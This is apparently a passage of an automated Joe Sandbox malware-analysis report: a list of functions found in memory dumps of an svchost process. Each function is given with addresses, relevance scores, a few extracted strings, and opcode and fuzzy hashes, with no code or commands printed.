                                                                              • Opcode ID: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                              • Instruction ID: 25bf37e931ab92400de16b3e3626f1a6e61acdee3cccd67151376574a9a3b495
                                                                              • Opcode Fuzzy Hash: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                              • Instruction Fuzzy Hash: F1A10931A08368ABDF28DB698945FFEA7B95F56304F0840DFFD87AB281D6748940CB51
                                                                              Function 00402650 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: I
                                                                              • API String ID: 0-3707901625
                                                                              • Opcode ID: 374332b86d9cc2b53e02d0e6a95bb3c640f25e6c98a907c31a1ae20a5c442ab7
                                                                              • Instruction ID: aa154272957bab8e5290256277be23bda8b3dda8d4f1f6dd7fdccd919569c6b8
                                                                              • Opcode Fuzzy Hash: 374332b86d9cc2b53e02d0e6a95bb3c640f25e6c98a907c31a1ae20a5c442ab7
                                                                              • Instruction Fuzzy Hash: E3710775E0010A8BDF0CDE59CA983AEB762EB94314F28823ED915AF3C1D6BD9D418784
                                                                              Function 03A3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction ID: b2f80c38dc2a053429c2eaf52d74e07b08113aa363a6d3dd09591dff4710f7eb
                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction Fuzzy Hash: 35613C75D00219ABDF21DF99C944BAEFBB8EF85714F14456FE810B7290D7B49901CBA0
                                                                              Function 03A2B2D3 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 04Dw04DwIDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2081880359
                                                                              • Opcode ID: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                              • Instruction ID: b7cffca9b55cadc5ce182b24b595e6e4db7158a9e29d6fd6bafd6231a4bad012
                                                                              • Opcode Fuzzy Hash: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                              • Instruction Fuzzy Hash: DD412535600710AFCB25EF29DA80F2ABBA9EF44764F15456FE5599B790D770DC008BA0
                                                                              Function 03ABF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                              • Instruction ID: 0bc704624d42cc68630cbf413135b15625f66575521c2b6838c1d7963715d6c7
                                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                              • Instruction Fuzzy Hash: B2516772604345AFD721DF54CD84FAAB7BCFB84750F08092EB9809B291D7B4E914CB92
                                                                              Function 03A4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              • Opcode ID: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                              • Instruction ID: 469494d91b8942fadfeca3192ff490e22da4dfd56dcddbf3d0df3d4728d76353
                                                                              • Opcode Fuzzy Hash: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                              • Instruction Fuzzy Hash: 3D416D76608341ABD710DB65CA80F6BB7E8BFC9724F44092FB984EB280E674D9048796
                                                                              Function 03AEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PreferredUILanguages
                                                                              • API String ID: 0-1884656846
                                                                              • Opcode ID: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                              • Instruction ID: 0bf2ffc12b98ea59b1c9a5dbb3f6a22a7917a72c214b63e55c37e390f6d1f0f8
                                                                              • Opcode Fuzzy Hash: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                              • Instruction Fuzzy Hash: 3141D23AD0421AAFCB11EB98C985BEEF7B9AF44710F05016BE911EB654D6B4DE40C7B0
                                                                              Function 03AAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              • Opcode ID: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                              • Instruction ID: 9531dd9262fbd81c8677462acfe21dd1a65f00fb9eb8e8af66692a30cc91a83c
                                                                              • Opcode Fuzzy Hash: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                              • Instruction Fuzzy Hash: 544137B6D0062CABEB21DB54CD84FDEB77CAB45714F0045E6E608EB240DB709E498FA4
                                                                              Function 03AB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: verifier.dll
                                                                              • API String ID: 0-3265496382
                                                                              • Opcode ID: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                              • Instruction ID: 093dab7a00b60d91d4aad08fa41093c583ed1f2176691f80fd282057efe6ef59
                                                                              • Opcode Fuzzy Hash: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                              • Instruction Fuzzy Hash: 22318275A003019FDB34DFA99950AB7B6F9EB59314F58807FE6089F382E7318C818790
                                                                              Function 03A636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Flst
                                                                              • API String ID: 0-2374792617
                                                                              • Opcode ID: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                              • Instruction ID: ad910cae8ffb72d45c5c2f007937f99f5e71966715f942a1f1eaffa9f46bdbb5
                                                                              • Opcode Fuzzy Hash: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                              • Instruction Fuzzy Hash: 334189B5605301DFCB14CF18C580A26FBE4EF8A710F1885AFE45A8F291DB71D942CB91
                                                                              Function 03A29730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L4DwL4Dw
                                                                              • API String ID: 0-819149176
                                                                              • Opcode ID: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                              • Instruction ID: af420130cf843bbcfcf03bbe6508a1615216b530627310d86487e7881dd52406
                                                                              • Opcode Fuzzy Hash: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                              • Instruction Fuzzy Hash: E421C17AA00B20AFC321EF58C500B1BBFB5FB85B54F15046EE9699B740D770E811CBA0
                                                                              Function 03A35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx
                                                                              • API String ID: 0-89312691
                                                                              • Opcode ID: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                              • Instruction ID: f256d26678ab7bb053f7cf2611d7cd4d7713507027e2cb9e96716aed25fb04c4
                                                                              • Opcode Fuzzy Hash: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                              • Instruction Fuzzy Hash: 23115130F49A028FEB24DA1DD8506B6F2E9EB97364F38852FF452DB391D672D8418780
                                                                              Function 03AB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrCreateEnclave
                                                                              • API String ID: 0-3262589265
                                                                              • Opcode ID: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                              • Instruction ID: f7339886c24f0f9b86a058541bd63a05b53c3ec940793a936c8ea9a8cf0ec408
                                                                              • Opcode Fuzzy Hash: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                              • Instruction Fuzzy Hash: 8B21F3B1508344AFC320DF1A9944A9BFBE8FBD5B00F104A1FB5A49B251EBB09504CB92
                                                                              Function 03A6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                              • Instruction ID: 6fbce891d9f818f494d72422d15df822fdb05b6e321b029bfa68d0690afc47d2
                                                                              • Opcode Fuzzy Hash: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                              • Instruction Fuzzy Hash: 72822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                              Function 03A7516C Relevance: .8, Instructions: 785COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                              • Instruction ID: b3bf6c691027b21751907d691d6345ae7fc044addd97febb5ee356fea1904e5d
                                                                              • Opcode Fuzzy Hash: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                              • Instruction Fuzzy Hash: 24625D32D0464AAFCF25CF08D8D04AEFB62FE96314B49C59EC89A27604D371B955CBD1
                                                                              Function 03A8739A Relevance: .7, Instructions: 705COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                              • Instruction ID: 16fc4a8226e41a7dac7f2e65bf8ef19f50a48dd95ae372ad31c2479c48160fe3
                                                                              • Opcode Fuzzy Hash: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                              • Instruction Fuzzy Hash: 9742B275A006168FDB19DF59C480ABEF7B6FF88314B28856ED552AB340D736EC42CB90
                                                                              Function 03A85AA0 Relevance: .7, Instructions: 652COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                              • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                              • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                              • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                              Function 03A5B2C0 Relevance: .6, Instructions: 629COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                              • Instruction ID: 04ce30bfdaf64d71ccf378f6251d18e3c83e7f2c93f7933e3fbf6e43a6a8eb55
                                                                              • Opcode Fuzzy Hash: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                              • Instruction Fuzzy Hash: CF32AC75E01219DBCF24DFA8C980BAEBBB5FF54715F18012EE805AB391E7759901CBA0
                                                                              Function 03A42840 Relevance: .6, Instructions: 605COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                              • Instruction ID: 2bfcdc2998f07bb6f57392fc971a6311871a03aea88db90e97db48ad4b90c19e
                                                                              • Opcode Fuzzy Hash: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                              • Instruction Fuzzy Hash: 5532DD74A007558BEF24CF69C944BBEFBF6AF84314F18855FE486AB294DB35A801CB50
                                                                              Function 03ADA118 Relevance: .6, Instructions: 591COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                              • Instruction ID: 87f764a26d766adcee432b7554d6a7f803e4bbc619688835f37feaea24baf18e
                                                                              • Opcode Fuzzy Hash: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                              • Instruction Fuzzy Hash: 3422AB742046618BDB28CF29C094772B7F1AF45304F08889FE897CF686E739E592DB61
                                                                              Function 03AF16CC Relevance: .6, Instructions: 571COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                              • Instruction ID: 287ff0ca072b195f876349ec591eb16c6143cd7d0fe933948c9601898a150334
                                                                              • Opcode Fuzzy Hash: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                              • Instruction Fuzzy Hash: E522C335A00216CFCB19CF99C580ABAF3B2FF89314B18456EE655DB344DB34E942CB90
                                                                              Function 03AF1D5A Relevance: .6, Instructions: 559COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                              • Instruction ID: 1d437bc637994d3992a72425f0fbfaae8e3bf18cb03c79e04429648cfe023f1b
                                                                              • Opcode Fuzzy Hash: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                              • Instruction Fuzzy Hash: 7C228F796047128FC718CF59C490A2AF3E5FF89314B188A6EFA96CB355D730E842CB91
                                                                              Function 03A58DBF Relevance: .6, Instructions: 554COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                              • Instruction ID: 94df3cf246010cfaafb1c0041b3ecd38d6ee7f8b71d6a42ad1d269ada8b0e0de
                                                                              • Opcode Fuzzy Hash: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                              • Instruction Fuzzy Hash: 0E222D74E00216DBDF15CF95C5809BEFBFABF88704B18849BE845AB241E738D981CB64
                                                                              Function 03AF2446 Relevance: .5, Instructions: 485COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                              • Instruction ID: b62ed8de75b2f781a22b7813e12d41d21ccbffb24ed0dd0a4fb1a4ea06d110a2
                                                                              • Opcode Fuzzy Hash: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                              • Instruction Fuzzy Hash: 3202C0386046518FDB64CFAAC490375F7F1AF85300B58899FFA96CB281D738D842DB60
                                                                              Function 03B0B16B Relevance: .4, Instructions: 450COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                              • Instruction ID: 3b811accfb1cfa5ce37e2aabf50c2229fa77ce07ce53558ac097391ac4897ee2
                                                                              • Opcode Fuzzy Hash: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                              • Instruction Fuzzy Hash: 73F1C372E006159BCB18CFA9C9A067EFFF5EF98214B1941B9D456DB3C0E634EA41CB90
                                                                              Function 004101E3 Relevance: .4, Instructions: 435COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                              • Instruction ID: ce515182fef757e73aeb42bf0f94abc608d42de38618f3313618c63175d3655c
                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                              • Instruction Fuzzy Hash: 34026F73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                              Function 03B0A9A6 Relevance: .4, Instructions: 425COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                              • Instruction ID: d1e54e0368da9e29f3f0aed82128caba8a998576649fb9c4ca28242c9b9f0125
                                                                              • Opcode Fuzzy Hash: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                              • Instruction Fuzzy Hash: CFF19372E006269BCB28CE68C9A05BDFFB5EF45214B1946B9D856EB3C0D734DE41CB90
                                                                              Function 03A28397 Relevance: .4, Instructions: 380COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                              • Instruction ID: 939cfa0ea574c21447ad650e9f46939894ca7ff5000eaa234cc67455e4292d0b
                                                                              • Opcode Fuzzy Hash: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                              • Instruction Fuzzy Hash: 22D1C575A007269FCB14DF68C990ABABBB9BF54304F08466FF816DB280E738D945C760
                                                                              Function 03A5C6E0 Relevance: .4, Instructions: 367COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                              • Instruction ID: b2ffc979e7cadfe790f9783d28e1dbfa097eb35e5f5a32582f4532ce140d7aa8
                                                                              • Opcode Fuzzy Hash: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                              • Instruction Fuzzy Hash: CAD16971E043199BEF28CF98C5847BDBBB6FB45320F18806FE942AB699D7748941CB44
                                                                              Function 03A438E0 Relevance: .3, Instructions: 349COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                              • Instruction ID: 903f77be1ac4cbca7fe8baf5e9558ff801441611d76a48730291500461cb91d8
                                                                              • Opcode Fuzzy Hash: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                              • Instruction Fuzzy Hash: 59E18D75A00205CFDB18CF59C990BAAB7F5FF98310F2881AEE855AB791D730E951CB90
                                                                              Function 03A4CFE0 Relevance: .3, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                              • Instruction ID: f4b7adac504025bebbe3cadeac8e0987fca3345e1a0651529aef0ab6ce85b13f
                                                                              • Opcode Fuzzy Hash: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                              • Instruction Fuzzy Hash: 54D1B431A003198FDB35DB19C994BAAF7B5BB89304F0841EFD9099B242D774AD85CB51
